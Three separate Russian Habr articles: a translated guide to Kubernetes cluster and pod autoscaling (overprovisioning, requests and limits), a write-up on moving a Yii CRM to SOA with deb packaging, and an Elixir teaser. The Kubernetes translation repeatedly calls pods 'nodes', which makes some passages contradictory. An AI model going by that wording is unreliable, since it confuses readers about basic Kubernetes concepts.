Допустим, у вас есть приложение, которое всегда требует и использует 1,5 ГБ памяти и 0,25 vCPU. Вы зарезервировали кластер с одним узлом в 8 ГБ и двумя виртуальными ЦП. Этого как раз должно хватить на четыре ноды, даже с небольшим запасом.

Вы развертываете одну ноду и настраиваете его так:
1. **Горизонтальный автоскейлер** добавляет реплику каждые 10 входящих запросов. То есть при 40 одновременных запросах он должен масштабироваться до 4 реплик.
2. **Кластерный автоскейлер** добавляет узлы, когда ресурсы заканчиваются.
Горизонтальный автоскейлер может масштабировать реплики в развертывании с помощью настраиваемых показателей (custom metrics), таких как количество запросов в секунду (RPS) от контроллера Ingress.
Допустим, вы отправляете 30 одновременных запросов в кластер и наблюдаете следующее:
1. Горизонтальный автоскейлер начинает масштабирование модулей.
2. Созданы две новых ноды.
3. Кластерный автоскейлер не срабатывает — в кластере не создается новый узел.
Что логично, поскольку в узле достаточно места для еще одного модуля.

Вы увеличиваете трафик до 40 одновременных запросов и смотрите снова:
1. Горизонтальный автоскейлер создает еще одну ноду.
2. Нода находится на рассмотрении и не может быть развернута.
3. Кластерный автоскейлер запускает создание нового узла.
4. Узел подготавливается за 4 минуты. После этого развертывается ожидающая нода.

*При масштабировании до четырех реплик четвертая реплика не развертывается на первом узле. Вместо этого она остается «в ожидании» (pending)

Автоскейлер создает новый узел, и нода наконец развертывается*
Почему четвертая нода не развернута в первом узле? Модули, развернутые в кластере Kubernetes, потребляют ресурсы: память, ЦП и место на диске. Однако на том же узле есть операционная система и kubelet, которым также нужны память и процессор.
В рабочем узле Kubernetes память и ЦП делятся на:
1. ресурсы, необходимые для запуска операционной системы и системных демонов, таких как SSH, systemd и т. д.;
2. ресурсы, необходимые для запуска агентов Kubernetes, таких как kubelet, среда выполнения контейнера, [детектор неполадок в узлах](https://github.com/kubernetes/node-problem-detector);
3. ресурсы, доступные для нод;
4. ресурсы, зарезервированные до [порога вытеснения](https://kubernetes.io/docs/tasks/administer-cluster/reserve-compute-resources/#eviction-thresholds).

Все эти квоты можно настроить, но вам необходимо их учитывать.
В виртуальной машине с 8 ГБ и двумя виртуальными ЦП вы можете ожидать, что:
* 100 МБ памяти и 0,1 виртуального ЦП зарезервированы для операционной системы;
* 1,8 ГБ памяти и 0,07 виртуального процессора зарезервированы для kubelet;
* 100 МБ памяти зарезервированы для порога вытеснения.
Остальные ~6 ГБ памяти и 1,83 виртуальных ЦП могут использоваться модулями.
Если в кластере запущен DeamonSet, такой как kube-proxy, то вам следует дополнительно уменьшить доступную память и ЦП. Учитывая, что kube-proxy нужно 128 МБ памяти и 0,1 виртуального ЦП, для запуска модулей доступны только ~5,9 ГБ памяти и 1,73 виртуального ЦП.
Использование CNI (например, Flannel) и сборщика журналов (например, Fluentd) еще сильнее снижает объем доступных ресурсов.
После учета всех дополнительных ресурсов у вас остается место только для трех нод.
```
OS 100MB, 0.1 vCPU +
Kubelet 1.8GB, 0.07 vCPU +
Eviction threshold 100MB, 0 vCPU +
Daemonsets 128MB, 0.1 vCPU +
======================================
Used 2.1GB, 0.27 vCPU
======================================
Available to Pods 5.9GB, 1.73 vCPU
Pod requests 1.5GB, 0.25 vCPU
======================================
Total (4 Pods) 6GB, 1vCPU
```
Четвертая остается «ожидающей», если ее нельзя развернуть на другом узле.
Поскольку кластерный автоскейлер знает, что для четвертого модуля нет места, почему он не подготавливает новый узел? Почему он ждет статуса «в ожидании» у ноды, прежде чем запускает создание узла?
Как работает кластерный автоскейлер в Kubernetes
------------------------------------------------
Кластерный автоскейлер не смотрит на доступную память или ЦП, когда запускает автомасштабирование. Вместо этого он реагирует на события и каждые 10 секунд проверяет, не появились ли не подлежащие планированию модули.
Нода не подлежит планированию, когда планировщик не может найти узел для ее размещения. Например, если нода запрашивает 1 vCPU, но в кластере доступно только 0,5 vCPU, такая нода помечается как не подлежащая планированию. Именно в этом случае кластерный автоскейлер инициирует создание нового узла.
CA сканирует текущий кластер и [проверяет, подходит ли какой-либо из непланируемых модулей для нового узла](https://github.com/kubernetes/autoscaler/blob/master/cluster-autoscaler/FAQ.md#what-are-expanders).
Если у вас есть кластер с несколькими типами узлов (их часто называют группами или пулами узлов), то CA выберет один из них, используя следующие стратегии:
* **Random** — выбирает тип узла случайным образом. Эта стратегия используется по умолчанию;
* **Most pods** — выбирает группу узлов, которая будет планировать наибольшее количество модулей;
* **Least waste** — выбирает группу узлов с наименьшим количеством простоев ЦП после масштабирования;
* **Price** — выбирает группу узлов, которая стоит меньше всего;
* **Priority** — выбирает группу узлов с наивысшим приоритетом (и вам нужно вручную назначить приоритеты).
После определения типа узла кластерный автоскейлер вызовет соответствующий API, чтобы зарезервировать новый вычислительный ресурс. Если вы используете AWS, то CA создаст новый экземпляр EC2. В Azure он создаст новую виртуальную машину, а в GCP — новый Compute Engine.
Может пройти некоторое время, прежде чем созданные узлы появятся в Kubernetes.
Когда вычислительный ресурс готов, узел инициализируется и добавляется в кластер, где могут быть развернуты незапланированные ноды. К сожалению, новые узлы обычно готовятся медленно: резервирование новой вычислительной единицы может занять несколько минут. Давайте углубимся в цифры.
Сколько времени уходит на автомасштабирование нод
-------------------------------------------------
Есть четыре основных фактора, которые определяют время, необходимое для создания нового модуля на новом узле:
1. время реакции горизонтального автоскейлера,
2. время реакции кластерного автоскейлера,
3. время подготовки узла,
4. время создания ноды.
По умолчанию kubelet очищает статистику использования ЦП и памяти модулем каждые 10 секунд. Каждую минуту сервер метрик агрегирует эти показатели и делает их доступными остальной части Kubernetes API.
Контроллер горизонтального автоскейлера проверяет показатели и принимает решение о масштабировании реплик в большую или меньшую сторону.
По умолчанию горизонтальный автоскейлер проверяет показатели модулей каждые 15 секунд.

Каждые 10 секунд кластерный автоскейлер проверяет кластер на наличие не подлежащих планированию модулей. Как только один или несколько модулей обнаружены, он запускает алгоритм, чтобы решить:
1. **Сколько узлов** необходимо для развертывания всех ожидающих нод.
2. **Какой тип группы узлов** следует создать.
Весь процесс должен занять:
* **не более 30 секунд** для кластера, в котором менее 100 узлов, а в каждом из них до 30 модулей. Средняя задержка — около 5 секунд;
* **не более 60 секунд** в кластере от 100 до 1000 узлов. Средняя задержка — около 15 секунд.

Кроме того, некоторое время уходит на подготовку узла — в основном, оно зависит от облачного провайдера. Подготовка нового вычислительного ресурса, как правило, занимает от 3 до 5 минут.

Наконец, нода должна быть создана средой выполнения контейнера.
Запуск контейнера не должен занимать более нескольких миллисекунд, но для загрузки образа контейнера может потребоваться несколько секунд.
Если вы не кэшируете образы контейнеров, то загрузка образа из реестра контейнеров может занять от пары секунд до минуты, в зависимости от размера и количества слоев.

Таким образом, общее время для запуска автомасштабирования, когда в текущем кластере нет места, складывается из следующих составляющих:
1. **Горизонтальному автоскейлеру** может потребоваться до 1 минуты 30 секунд, чтобы увеличить количество реплик.
2. **Кластерному автоскейлеру** нужно меньше 30 секунд для кластера, в котором менее 100 узлов, и менее минуты — для кластера, в котором более 100 узлов.
3. **Поставщику облачных услуг** может потребоваться от 3 до 5 минут для создания компьютерного ресурса.
4. **Среде выполнения контейнера** может потребоваться до 30 секунд для загрузки образа контейнера.
В худшем случае при небольшом кластере получается так:
```
HPA delay: 1m30s +
CA delay: 0m30s +
Cloud provider: 4m +
Container runtime: 0m30s +
=========================
Total 6m30s
```
В кластере с более чем 100 узлами общая задержка может составлять до 7 минут.
Готовы ли вы 7 минут ждать появления новых модулей, чтобы справиться с внезапным всплеском трафика? Можно ли настроить автомасштабирование так, чтобы уменьшить длительность подготовки нового узла?
Да, вы можете изменить:
* Время обновления для горизонтального автоскейлера. Его контролирует флаг `--horizontal-pod-autoscaler-sync-period`, по умолчанию — 15 секунд.
* Интервал очистки метрик на сервере метрик. Его контролирует флаг `metric-resolution`, по умолчанию — 60 секунд.
* Частоту сканирования незапланированных модулей кластерным автоскейлером. Контролирует флаг `scan-interval`, по умолчанию — 10 секунд.
* Способ кэширования изображения на локальном узле. Можно изменить с помощью такого инструмента, как [kube-fledged](https://github.com/senthilrch/kube-fledged).
Но даже если вы зададите значения поменьше, вы все равно будете ограничены длительностью подготовки ресурсов, которое зависит от облачного провайдера.
Можно ли что-то с этим сделать?
Раз длительность подготовки изменить нельзя, придется использовать обходной путь. Вы можете попробовать две вещи:
1. По возможности не создавать новые узлы.
2. Заранее создавать узлы, чтобы они уже были подготовлены, когда они вам понадобятся.
Давайте рассмотрим эти варианты.
Как выбрать оптимальный размера экземпляра узла Kubernetes
----------------------------------------------------------
Выбор правильного типа экземпляра для кластера существенно влияет на стратегию масштабирования.
Давайте рассмотрим следующий сценарий. У вас есть приложение, которое запрашивает 1 ГБ памяти и 0,1 виртуального ЦП. Вы подготавливаете узел с 4 ГБ памяти и 1 виртуальным ЦП.
После резервирования памяти и ЦП для kubelet, операционной системы и порога вытеснения у вас остается ~2,5 ГБ памяти и 0,7 виртуального ЦП, которые можно использовать для запуска модулей.

В вашем узле есть место только для двух модулей. При каждом масштабировании реплик вы, скорее всего, столкнетесь с задержкой до 7 минут — столько времени тратится на запуск горизонтального автоскейлера, запуск кластерного автоскейлера и выделение вычислительных ресурсов у облачного провайдера.
Давайте посмотрим, что произойдет, если вы решите использовать вместо этого узел, под который выделено 64 ГБ памяти и 16 виртуальных ЦП. После резервирования памяти и ЦП для kubelet, операционной системы и порога вытеснения у вас остается ~58,32 ГБ памяти и 15,8 виртуальных ЦП, которые можно использовать для запуска модулей. Доступное пространство может вместить 58 модулей, и, скорее всего, вам понадобится новый узел только тогда, когда у вас будет больше 58 реплик.

Кроме того, каждый раз, когда узел добавляется в кластер, можно развернуть несколько модулей. При этом у вас меньше шансов снова запустить кластерный автоскейлер и начать подготовку новых вычислительных ресурсов в облачном провайдере.
У больших экземпляров есть еще одно преимущество: больше соотношение между ресурсами, зарезервированными для kubelet, операционной системы и порога вытеснения, и доступными ресурсами для запуска модулей.
Взгляните на график, где изображена доступная для модулей память.

По мере увеличения размера экземпляра пропорционально растут ресурсы, доступные модулям. Другими словами, вы используете ресурсы эффективнее, чем если бы у вас было два экземпляра в половину этого размера каждый.
Нужно ли всякий раз выбирать самый большой экземпляр? Пик эффективности зависит от того, сколько модулей у вас может быть на узле. Некоторые облачные провайдеры ограничивают количество модулей. Например, у GKE их может быть 110. У других есть ограничения для каждого отдельно взятого экземпляра, продиктованные сетевой инфраструктурой (например, у AWS).
Выбор экземпляра большего размера не всегда хороший вариант. Вам также следует учитывать следующие моменты:
1. Радиус взрыва (blast radius) — если у вас всего несколько узлов, то влияние отказавшего узла больше, чем если бы у вас было много узлов.
2. Автомасштабирование менее рентабельно, поскольку следующий шаг — создание очень большого узла.
Даже если вы выбрали правильный тип экземпляра для кластера, вы все равно можете столкнуться с задержкой в предоставлении новых вычислительных мощностей. Можно ли обойти и это? А что, если создавать новый узел заранее, а не когда дело дошло до масштабирования?
Избыточное выделение ресурсов под узлы в кластере Kubernetes
------------------------------------------------------------
Если вы можете позволить себе всегда иметь запасной узел, то можно:
1. Создать узел и оставить его пустым.
2. Создать еще один пустой узел, как только в пустом узле появится нода.
Другими словами, вы учите автоскейлер всегда иметь запасной пустой узел на случай необходимости.

*При избыточном выделении ресурсов под кластер узел всегда пуст и готов к развертыванию модулей

Как только нода создается в пустом узле, кластерный автоскейлер создает новый узел

Поскольку узел создается в фоновом режиме, вы, скорее всего, не заметите подготовки облачной машины*
Получается компромисс: вы несете дополнительные расходы (одна пустая вычислительная единица, доступная в любое время), но увеличиваете скорость. Эта стратегия позволяет заметно быстрее масштабировать вычислительную инфраструктуру.
Но тут есть и плохие, и хорошие новости. Плохая новость: в кластерный автоскейлер эта функция не встроена. Его нельзя настроить на проактивную работу, и нет флага, позволяющего всегда предоставлять пустой узел. Хорошая новость: вы можете обойти это ограничение, запустив развертывание с достаточным количеством запросов, чтобы зарезервировать целый узел. Вы можете рассматривать эту ноду как заглушку: он
Как только настоящая нода создана, вы можете удалить заглушку и развернуть ноду.

*В кластере с избыточным выделением ресурсов у вас есть нода в качестве заглушки с низким приоритетом

Как только вы создаете больше реплик, планировщик удаляет ноду-заглушку и развертывает новую ноду. Нода-заглушка не подлежит планированию и запускает автоматическое масштабирование кластера

В фоновом режиме подготавливается новый узел, и в нем развертывается нода-заглушка*
Обратите внимание, что на этот раз вам все равно придется подождать 5 минут, пока узел будет добавлен в кластер, но при этом вы можете продолжать использовать текущий узел. Тем временем в фоновом режиме создается новый узел.
Как этого добиться? Избыточное выделение ресурсов можно настроить с помощью развертывания, в котором запущена вечно «спящая» нода.
```
apiVersion: apps/v1
kind: Deployment
metadata:
name: overprovisioning
spec:
replicas: 1
selector:
matchLabels:
run: overprovisioning
template:
metadata:
labels:
run: overprovisioning
spec:
containers:
- name: pause
image: k8s.gcr.io/pause
resources:
requests:
cpu: '1739m'
memory: '5.9G'
```
Особое внимание стоит уделить требованиям к памяти и процессору. Планировщик использует эти значения, чтобы решить, где развернуть ноду. В этом конкретном случае они используются для резервирования места.
Вы можете подготовить одну большую ноду, требования которой примерно соответствуют доступным ресурсам узла. Убедитесь, что вы учитываете ресурсы, потребляемые kubelet, операционной системой, kube-proxy и т. д. Если у экземпляра узла есть два виртуальных ЦП и 8 ГБ памяти, а доступные ресурсы для модулей составляют 1,73 виртуальных ЦП и ~5,9 ГБ памяти, то запасная нода должна соответствовать последней паре параметров.

Чтобы гарантировать вытеснение модуля-заглушки при создании настоящего модуля, вы можете использовать [приоритеты и вытеснения](https://kubernetes.io/docs/concepts/scheduling-eviction/pod-priority-preemption/). Приоритет модуля указывает на важность одного модуля в сравнении с другими. Когда нода не может быть запланирована, планировщик пытается вытеснить ноду с более низким приоритетом, чтобы запланировать ожидающую.
Вы можете настроить приоритеты модуля в кластере с помощью PodPriorityClass:
```
apiVersion: scheduling.k8s.io/v1beta1
kind: PriorityClass
metadata:
name: overprovisioning
value: -1
globalDefault: false
description: 'Priority class used by overprovisioning.'
```
Поскольку по умолчанию приоритет модуля равен `0`, а `PriorityClass` для `overprovisioning` равен `-1`, эти модули будут исключены первыми, когда в кластере закончится место.
У `PriorityClass` есть еще два необязательных поля: `globalDefault`
и `description`.
* В поле `description` можно вписать памятку, чему посвящен `PriorityClass`.
* Поле `globalDefault` указывает, что значение этого `PriorityClass` должно использоваться для модуля без `priorityClassName`. В системе может существовать только один `PriorityClass` с `globalDefault`, установленным в `true`.
Вы можете назначить приоритет модулю-заглушке следующим образом:
```
apiVersion: apps/v1
kind: Deployment
metadata:
name: overprovisioning
spec:
replicas: 1
selector:
matchLabels:
run: overprovisioning
template:
metadata:
labels:
run: overprovisioning
spec:
priorityClassName: overprovisioning
containers:
- name: reserve-resources
image: k8s.gcr.io/pause
resources:
requests:
cpu: '1739m'
memory: '5.9G'
```
Настройка завершена!
Когда в кластере недостаточно ресурсов, нода-заглушка вытесняется, и ее место занимают новые модули. Поскольку нода-заглушка становится непланируемой, она заставляет кластерный автоскейлер добавлять в кластер дополнительные узлы.
Теперь, когда вы готовы к избыточному выделению ресурсов в кластере, стоит взглянуть на оптимизацию приложений для масштабирования.
Как правильно подобрать требования к памяти и ЦП для модулей
------------------------------------------------------------
Кластерный автоскейлер принимает решение о масштабировании в зависимости от того, есть ли ожидающие модули. Планировщик Kubernetes назначает (или не назначает) ноду узлу, основываясь на ее требованиях к доступной памяти и процессору. Поэтому важно указать правильные требования к рабочим нагрузкам, иначе вы можете запустить автомасштабирование слишком поздно или слишком рано.
Давайте рассмотрим следующий пример. Вы отпрофилировали приложение и выяснили:
* При средней нагрузке приложение потребляет 512 МБ памяти и 0,25 виртуального ЦП.
* На пике приложение, вероятно, потребляет до 4 ГБ памяти и 1 виртуальный ЦП.

Ограничение для вашего контейнера — 4 ГБ памяти и 1 виртуальный ЦП. Но что там с требованиями? Планировщик использует требования модуля к памяти и ЦП, чтобы выбрать лучший узел перед созданием модуля.
Итак, вы могли бы:
1. Установить количество запросов ниже фактического среднего использования.
2. Подойти к вопросу консервативно и задавать требования ближе к пределу.
3. Установить требования в соответствии с фактическими ограничениями.

*Вы могли бы указывать требования, которые меньше среднего потребления приложения

Вы могли бы указывать требования, которые соответствуют фактическому использованию

Вы могли бы указывать повышенные требования, которые будут соответствовать лимитам приложения*
Задавать требования ниже фактического использования проблематично, поскольку узлы часто будут перегружены. Например, вы можете задать требование к памяти в 256 МБ. Тогда планировщик Kubernetes сможет вместить вдвое больше модулей для каждого узла. Однако на практике модули используют вдвое больше памяти, начинают конкурировать за ресурсы (ЦП) и в итоге вытесняются (недостаточно памяти на узле).

Избыточное резервирование ресурсов под узлы может привести к чрезмерному вытеснению, увеличению объема работы для kubelet и значительному изменению планирования.
Что произойдет, если вы установите требования равными лимитам приложения? В Kubernetes это часто называют [классом гарантированного качества обслуживания](https://kubernetes.io/docs/tasks/configure-pod-container/quality-service-pod/#qos-classes). По сути, это означает, что вероятность прерывания и вытеснения модуля близка к нулю. Планировщик Kubernetes резервирует весь ЦП и память для модуля на назначенном узле. Модули с гарантированным качеством обслуживания стабильны, но при этом неэффективны. Если ваше приложение использует в среднем 512 МБ памяти, но вы зарезервировали для него 4 ГБ, то большую часть времени у вас остаются неиспользованными 3,5 ГБ.

Стоит ли оно того? Если вам нужна дополнительная стабильность — да. Но если вам нужна эффективность, то вы можете понизить требования и оставить промежуток между ними и лимитом. Это часто называют взрывным (burstable) классом качества обслуживания, то есть базовое потребление модуля иногда может резко перерастать в использование большего объема памяти и ЦП.
Когда требования к ресурсам соответствуют их фактическому использованию приложением, планировщик эффективно упаковывает ваши модули в узлы.
Однако иногда приложению может потребоваться больше памяти или ЦП. В этом случае:
1. Если **в узле есть ресурсы**, то приложение будет использовать их, пока не вернется к базовому потреблению.
2. Если **в узле не хватает ресурсов**, то нода будет конкурировать за ресурсы (ЦП), и kubelet может попытаться вытеснить ноду (память).
Что следует использовать — гарантированное или взрывное качество обслуживания? Ориентируйтесь на свои задачи.
1. Используйте гарантированное качество обслуживания (требования равны лимитам), если хотите минимизировать перепланирование и вытеснение модуля. Отличный пример — нода для базы данных.
2. Используйте взрывное качество обслуживания (требования равны фактическому среднему использованию), когда хотите оптимизировать кластер и разумно использовать ресурсы. Подходит для веб-приложения или REST API.
Как выбрать правильные запросы и значения лимитов? Профилируйте приложение и измеряйте потребление памяти и ЦП в режиме ожидания, под нагрузкой и на пике.
Более простая стратегия состоит в том, чтобы развернуть вертикальный автоскейлер и дождаться, пока он предложит правильные значения. Вертикальный автоскейлер собирает данные из модуля и применяет регрессионную модель для экстраполяции требований и лимитов. Подробности вы можете узнать из [этой статьи](https://learnk8s.io/setting-cpu-memory-limits-requests).
А как насчет уменьшения размера кластера?
-----------------------------------------
Каждые 10 секунд кластерный автоскейлер смотрит, не упало ли потребление ресурсов ниже 50 %, и решает, нужно ли удалить узел. Другими словами, он суммирует запросы к ЦП и памяти для всех модулей в узле. Если они меньше половины емкости узла, то CA рассмотрит возможность уменьшения текущего узла.
> **Примечание.** Кластерный автоскейлер не учитывает фактическое использование, лимиты ЦП и памяти. Вместо этого он рассматривает только запросы ресурсов.
Перед удалением узла CA делает следующее:
* [проверяет модули](https://github.com/kubernetes/autoscaler/blob/master/cluster-autoscaler/FAQ.md#what-types-of-pods-can-prevent-ca-from-removing-a-node), чтобы убедиться, можно ли переместить их в другие узлы;
* [проверяет узлы](https://github.com/kubernetes/autoscaler/blob/master/cluster-autoscaler/FAQ.md#i-have-a-couple-of-nodes-with-low-utilization-but-they-are-not-scaled-down-why), чтобы предотвратить их преждевременное удаление.
Если проверки пройдены, CA удаляет узел из кластера.
Почему бы не масштабировать автоматически, ориентируясь на память или ЦП?
-------------------------------------------------------------------------
Кластерные автоскейлеры, которые полагаются на данные ЦП и памяти, не учитывают модули при масштабировании вверх и вниз. Представьте, что у вас есть кластер с одним узлом и настройка автомасштабирования, при которой новый узел создается при достижении расхода 80 % ЦП. Вы решили создать развертывание с тремя репликами. Совместное использование ресурсов для трех модулей достигает 85 % ЦП. Новый узел подготовлен.
А что делать, если вам больше не нужны модули? У вас полный узел на холостом ходу — это не очень хорошо. Поэтому использование автомасштабирования такого типа с Kubernetes не рекомендуется.
Заключение
----------
Чтобы определить и реализовать успешную стратегию масштабирования в Kubernetes, вы должны хорошо разбираться в следующих предметах:
* распределяемые ресурсы в узлах Kubernetes;
* точная настройка интервалов обновления для сервера метрик, горизонтального и кластерного автоскейлеров;
* разработка архитектуры кластера и планирование размеров экземпляров узла;
* кэширование образов контейнера;
* нагрузочное тестирование и профилирование приложений.
Подобрав подходящий инструмент мониторинга, вы можете последовательно тестировать стратегию масштабирования и настраивать скорость работы и стоимость кластера.
> Мы развиваем наш [собственный Kubernetes aaS](https://mcs.mail.ru/containers/), о котором [рассказывали в этой статье](https://habr.com/ru/company/mailru/blog/519366/). Будем признательны, если вы его попробуете и дадите нам обратную связь. Для тестирования пользователям при регистрации начисляется 3000 бонусных рублей.
**Что еще почитать:**
1. [Рабочие узлы Kubernetes: много маленьких или несколько больших?](https://habr.com/ru/company/mailru/blog/484334/)
2. [Устранение неполадок в Kubernetes: в каком направлении двигаться, если что-то идет не так](https://mcs.mail.ru/blog/troubleshooting-kubernetes)
3. [Телеграм-канал с новостями о Kubernetes](https://t.me/k8s_mail) | https://habr.com/ru/post/650591/ | null | ru | null |
# Переход от 2-х звенки к архитектуре служб в парадигме SOA
В данной статье я бы хотел поделиться своим опытом организации перехода от классической 2-х звенки к парадигме SOA, также затронуть некоторые аспекты деплоя в рамках enterprise-решения и интеграции со смежными службами, написанными на Java
##### Предистория
Последние 3 года я работал в отделе внутренней автоматизации компании Новотелеком. Основное развитие систем для автоматизации внутренних процессов смежных с IT подразделений началось в 2008 году вместе с активным ростом самой кампании. В то время руководство не ставило целей делать качественные решения, основной целью было завоевание рынка, и это отложило отпечаток на принимаемые решения. Основной из систем над которыми работает отдел ВА — это внутренняя CRM система, которая включает в себя также элементы планирования человеческих ресурсов и справочные системы. Долгое время система писалась на самописном фреймворке, но после знакомства с Yii и реализации сайта компании на нем, было принято решение перевода системы на данный фреймворк. Обсуждения почему был выбран именно этот фреймворк выходят за рамки моей статьи.
При первоначальном переводе на Yii наша команда решила оставить архитектуру без кардинальных изменений т.к. темп разработки рос, а внутренние процессы организации работы были еще не на том уровне, чтобы ставить в приоритет архитектурные аспекты. Таким образом спустя год на Yii было переведено примерно треть функционала текущей системы. Определенно мы увеличили темп разработки т.к. фреймворк помог решить много типовых задач, на решение которых ранее уходило много времени. Но оставался один момент, который начал беспокоить все чаще. Нужно было все таки решить архитектурные вопросы, пока все не зашло в зону не возврата. Решающим фактором в принятии решения по переходу к службам вместо одного монолитного приложения стало выделение в кампании роли межсистемного архитектора, который начал приводить в порядок все внутренние процессы и архитектурные аспекты. На данную роль назначили архитектора одной из смежных групп, которые пишут ПО на Java. В их группе изначально была выбрана soa-парадигма и за последние 3-5 лет эта практика показала все плюсы и минусы данного подхода.
##### Немного об окружении
* OS Debian 6
* веб-сервер nginx
* php 5.3
* framework yii
* система сборки и деплоя phing
* службы устанавливаются как deb-пакеты
* протокол интеграции со смежными службами [hessian](http://hessianphp.sourceforge.net/)
##### Ограничения
Изначально был выбран подход разработки с использованием модулей, которые объединяли в себе слои бизнес логики, например, заявка клиента, карточка клиента и т.п. При переходе к службам встал вопрос как организовать структуру приложения реализовать, как деплоить, как хранить в SVN.
Для решения подобных задач есть несколько подходов. Один из них в свое время предложили ребята из 2Gis в [своей статье](http://habrahabr.ru/company/2gis/blog/130162/). Также можно использовать похожее решение в организации структуры приложения — [Yiinitializr](http://yiinitializr.2amigos.us/). Решение от 2amigos достаточно хорошее, но просто так взять и перенести все на него было уже достаточно проблематично. Поэтому пришлось сделать свой велосипед на основе уже имеющихся примеров и полученном опыте работы с Yii
##### Немного о SOA
На первом этапе были выделены следующие службы

На схеме выделены 2 внутренних слоя: core и portal
**Core** — слой общих компонентов, необходимых для корректной работы всех служб, плюс библиотеки, например yii, behat, ratcher и т.д., а также набор компонентов для интеграции со смежными службами.
**Portal** — пользовательские интерфейсы.
Кроме этого на схеме представлен слой внутренних и внешних служб и протоколы взаимодействия
##### Подробнее о реализации
Каждое приложение, будь то служба или пользовательский интерфейс, имеет одну из двух точек входа: **web** и **console**. Например, в случае службы web точкой входа является rest api.
Хранение конфигов сделано по аналогии с yiinitializr с учетом наших особенностей. Таким образом каждое приложение имеет следующую структуру конфигов:
* service.web.php — конфиг для веб-части
* service.console.php — конфиг для консольной части
* service.test.php — конфиг для запуска автотестов
* service.base.php — общий конфиг для всех предыдущих. Подключается внутри каждого из них
* env/local.php — конфиг в который вынесены параметры, зависящие от окружения (dev, test или production)
* sections/routes.php — правила маршрутизации
За инициализацию приложения отвечает компонент ApplicationDispatcher в пакете common, который реализует следующие функции: подготовка конфига, прописывание внутренних алиасов, прописывание маршрутов и предоставляет методы для получения путей до директорий в зависимости от окружения, например, до папки с временными файлами или логами.
Компонент подключается в index.php и вызывается следующим образом
**Исходный код index.php**
```
// Скрипт инициализации приложения
if(!file_exists('/usr/share/ntk-rm-common/protected/components/ApplicationDispatcher.php')) {
throw new Exception('Необходимо установить пакет ntk-rm-common');
}
require_once('/usr/share/ntk-rm-common/protected/components/ApplicationDispatcher.php');
// Создаем и запускаем экземпляр приложения
$dispatcher = ApplicationDispatcher::getInstance();
// Указываем тип окружения: бой или разработка
$dispatcher->setEnvironment(ApplicationDispatcher::ENV_PRODUCTION);
// Указываем тип приложения
$dispatcher->setApplicationType(ApplicationDispatcher::APP_TYPE_WEB);
// Запускаем скрипт создания приложения
$dispatcher->create('crm')->run();
```
**Исходный код метода create**
```
/**
* Создание экземпляра приложения
* @param $service - название инициализируемой службы
* @return mixed
* @throws Exception
*/
public function create($service) {
$this->service = $service;
if(empty($this->app_type)) {
throw new Exception('Укажите тип приложения: web или console');
}
// Подключаем глобальный хелпер
require_once $this->getBasePath('common') . '/helpers/global.php';
$config = $this->prepareConfig();
// прописываем путь до папки с временными файлами
$config['runtimePath'] = $this->getRuntimePath($service);
// прописываем путь до папки с исходниками - protected
$config['basePath'] = $this->getBasePath($service);
$this->setAliases();
if ($this->app_type == self::APP_TYPE_WEB) {
$this->app = Yii::createWebApplication($config);
// Подгружаем правила маршрутизации
$this->setRoutes();
// Прописываем путь до папки assets в зависимости от окружения
$basePath = $this->getHtdocsPath($this->service) . '/assets/';
$this->app->getAssetManager()->setBasePath($basePath);
} else {
defined('STDIN') or define('STDIN', fopen('php://stdin', 'r'));
$this->app = Yii::createConsoleApplication($config);
}
return $this->app;
}
```
**Логика подготовки файла конфигурации мало чем отличается от той, что используется в Yii-Boilerplate или Yiinitializr**
```
/**
* Склеивание конфигов в один.
* @return array|mixed
* @throws Exception - ошибка в случае если не найден конфиг приложения
*/
private function prepareConfig() {
if (!$this->isExistsServiceConfig()) {
throw new Exception('Конфигурационный файл службы «' . $this->getServiceConfigName() . '» не найден. Проверьте правильность пути.');
}
// Подключаем конфиги службы
$service_configs = array(
'/' . $this->service . '.' . $this->app_type . '.php',
'/env/local.php'
);
$config = $this->mergeConfigs(array(), $service_configs , $this->getConfigPath(($this->service)));
// Подключаем общие конфиги
$common_configs = array(
'/env/local.php',
'/common.base.php',
$this->app_type == self::APP_TYPE_WEB ? '/common.web.php' : '/common.console.php',
);
$config = $this->mergeConfigs($config, $common_configs, $this->getConfigPath('common'));
// Подключаем конфиги backend части
$backend_configs = array(
'/php-backend.base.php',
'/env/local.php',
);
$config = $this->mergeConfigs($config, $backend_configs, $this->getConfigPath('php-backend'));
return $config;
}
```
##### Структура пакета
Как уже было сказано выше установка служб в production происходит через deb-пакеты. Для полной поддержки debian-way при установке deb-пакета приложение раскидывается по следующим директориям:
* /usr/share/<имя-службы>/protected/ — исходники службы
* /usr/share/doc/<имя-службы>/ — пример конфига local.default.php
* /usr/bin/<имя-службы> — исполняемый файл для запуска роботов
* /var/www/<имя-службы>/htdocs/ — директория для веб-севера
* /var/tmp/<имя-службы>/ — директория для хранения временных файлов
* /var/log/<имя-службы>/ директория для хранения логов службы
##### Сборка пакета с помощью утилиты Phing
За сборку пакета отвечает утилита phing, которая:
* выкачивает из svn актуальную версию из ветки trunk
* разносит все по нужным директориями в соответствии с тем как описано выше
* вызывает команду для сборки пакета
* создает метку в svn
* заливает пакет на сервер-репозиторий debian пакетов
**Пример кода из задачи по формированию структуры пакета**
```
```
##### Заключение
В заключении хотелось бы отметить, что у данного решения есть как плюсы, так и минусы. Из основных плюсов, полученных после внедрения данной схемы можно выделить поддержку debian-way для пакетов, что облегчает жизнь ребятам из поддержки. Также стало проще параллельно разрабатывать и внедрять новый функционал.
Статья носит ознакомительный характер т.к. в одной статье не раскрыть все аспекты. Готов ответить на вопросы, если они появятся.
В дополнение приведу немного ссылок на материалы про парадигму SOA:
* [www.soa-manifesto.org/default\_russian.html](http://www.soa-manifesto.org/default_russian.html)
* [www.gartner.com/it/content/754400/754413/twelve\_common\_soa\_mistakes.pdf](http://www.gartner.com/it/content/754400/754413/twelve_common_soa_mistakes.pdf)
* [essay.utwente.nl/57339/1/scriptie\_Steghuis.pdf](http://essay.utwente.nl/57339/1/scriptie_Steghuis.pdf) | https://habr.com/ru/post/223385/ | null | ru | null |
# Elixir
Erlang является уникальной по своим возможностям платформой, и не смотря на это, язык до сих пор является экзотикой. Причин существует несколько. Например, тугая арифметика, непривычность синтаксиса, функциональность. Это не недостатки. Это просто вещи, с которыми большинство программистов не могут или не хотят работать.
Несколько дней назад Jose Valim опубликовал в своем [репозитории](https://github.com/josevalim/elixir/) проект языка, построенного поверх Erlang. Этот язык обладает простой объектной моделью и Ruby-подобным синтаксисом. Под катом выжимки из документации и видео, демонстрирующее простой пример.
